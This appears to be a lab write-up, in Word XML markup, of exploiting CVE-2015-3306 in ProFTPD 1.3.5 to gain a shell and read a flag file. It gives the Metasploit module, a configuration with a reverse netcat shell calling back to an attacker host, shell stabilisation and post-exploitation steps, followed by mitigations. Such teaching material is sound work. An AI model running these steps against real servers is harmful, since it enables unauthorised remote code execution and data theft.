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ProFTPD 1.3.5 – CVE-2015-3306 Exploitation Write-Up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
        <w:t>Author: Neelesh Pandey</w:t>
        <w:br/>
        <w:t>Category: Network / FTP Exploitation</w:t>
        <w:br/>
        <w:t>Vulnerability: CVE-2015-3306</w:t>
        <w:br/>
        <w:t>Target IP: 172.20.16.197</w:t>
        <w:br/>
        <w:t>Service: ProFTPD 1.3.5</w:t>
        <w:br/>
        <w:t>Impact: Unauthenticated Remote Code Execution</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. Introduction</w:t>
        <w:br/>
        <w:br/>
        <w:t>ProFTPD is a popular open-source FTP server used for file transfer services.</w:t>
        <w:br/>
        <w:t>Version 1.3.5 of ProFTPD is vulnerable to CVE-2015-3306, a critical vulnerability</w:t>
        <w:br/>
        <w:t>in the mod_copy module that allows unauthenticated attackers to copy files on the</w:t>
        <w:br/>
        <w:t>server and achieve remote command execution.</w:t>
        <w:br/>
        <w:br/>
        <w:t>This lab demonstrates exploiting this vulnerability to gain shell access and</w:t>
        <w:br/>
        <w:t>retrieve a sensitive file from the target system.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>2. Vulnerability Overview (CVE-2015-3306)</w:t>
        <w:br/>
        <w:br/>
        <w:t>• Affected Version: ProFTPD 1.3.5</w:t>
        <w:br/>
        <w:t>• Vulnerable Module: mod_copy</w:t>
        <w:br/>
        <w:t>• Authentication Required: No</w:t>
        <w:br/>
        <w:t>• Attack Type: Remote Code Execution (RCE)</w:t>
        <w:br/>
        <w:br/>
        <w:t>The mod_copy module allows copying files using SITE CPFR and SITE CPTO commands.</w:t>
        <w:br/>
        <w:t>Due to improper access controls, attackers can abuse this feature without valid</w:t>
        <w:br/>
        <w:t>credentials to write malicious files to the web root and execute them.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>3. Service Enumeration</w:t>
        <w:br/>
        <w:br/>
        <w:t>Initial enumeration confirmed the FTP service and version:</w:t>
        <w:br/>
        <w:br/>
        <w:t>ftp 172.20.16.197</w:t>
        <w:br/>
        <w:br/>
        <w:t>Banner:</w:t>
        <w:br/>
        <w:t>220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)</w:t>
        <w:br/>
        <w:br/>
        <w:t>This version is known to be vulnerable to CVE-2015-3306.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>4. Exploitation Method</w:t>
        <w:br/>
        <w:br/>
        <w:t>Metasploit Framework was used to exploit the vulnerability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Module used:</w:t>
        <w:br/>
        <w:t>exploit/unix/ftp/proftpd_modcopy_exec</w:t>
        <w:br/>
        <w:br/>
        <w:t>Correct configuration is critical as the exploit uses FTP to write the payload</w:t>
        <w:br/>
        <w:t>and HTTP to execute it.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>5. Metasploit Configuration</w:t>
        <w:br/>
        <w:br/>
        <w:t>RHOSTS     : 172.20.16.197</w:t>
        <w:br/>
        <w:t>RPORT      : 80</w:t>
        <w:br/>
        <w:t>RPORT_FTP  : 21</w:t>
        <w:br/>
        <w:t>SITEPATH   : /var/www/html</w:t>
        <w:br/>
        <w:t>TMPPATH    : /tmp</w:t>
        <w:br/>
        <w:t>LHOST      : 10.8.22.67</w:t>
        <w:br/>
        <w:t>LPORT      : 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t>Payload:</w:t>
        <w:br/>
        <w:t>cmd/unix/reverse_netcat</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>6. Exploitation Output</w:t>
        <w:br/>
        <w:br/>
        <w:t>The exploit successfully uploaded and executed a PHP payload, resulting in a</w:t>
        <w:br/>
        <w:t>reverse shell connection.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Command shell session opened.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Although Metasploit reported a misleading message stating no session was created,</w:t>
        <w:br/>
        <w:t>the shell was active and accessible.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>7. Shell Stabilization</w:t>
        <w:br/>
        <w:br/>
        <w:t>The initial shell was unstable and non-interactive. The shell was upgraded using:</w:t>
        <w:br/>
        <w:br/>
        <w:t>script /dev/null -c bash</w:t>
        <w:br/>
        <w:br/>
        <w:t>This provided a fully interactive TTY shell on the target system.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>8. Post-Exploitation</w:t>
        <w:br/>
        <w:br/>
        <w:t>After gaining shell access, sensitive files were accessed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Command used:</w:t>
        <w:br/>
        <w:t>cat /secret.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t>This revealed the secret flag stored on the target system.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>9. Impact</w:t>
        <w:br/>
        <w:br/>
        <w:t>• Complete compromise of the FTP server</w:t>
        <w:br/>
        <w:t>• Unauthenticated remote command execution</w:t>
        <w:br/>
        <w:t>• Access to sensitive system files</w:t>
        <w:br/>
        <w:t>• Potential for privilege escalation and lateral movement</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>10. Mitigation</w:t>
        <w:br/>
        <w:br/>
        <w:t>• Upgrade ProFTPD to a patched version</w:t>
        <w:br/>
        <w:t>• Disable mod_copy if not required</w:t>
        <w:br/>
        <w:t>• Restrict FTP access and apply proper authentication</w:t>
        <w:br/>
        <w:t>• Monitor FTP commands and server logs</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>11. Conclusion</w:t>
        <w:br/>
        <w:br/>
        <w:t>This lab demonstrates how a misconfigured FTP service can lead to full system</w:t>
        <w:br/>
        <w:t>compromise. CVE-2015-3306 highlights the importance of secure module configuration</w:t>
        <w:br/>
        <w:t>and regular patching of services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>Disclaimer:</w:t>
        <w:br/>
        <w:t>This write-up is for educational and authorized penetration testing purposes only.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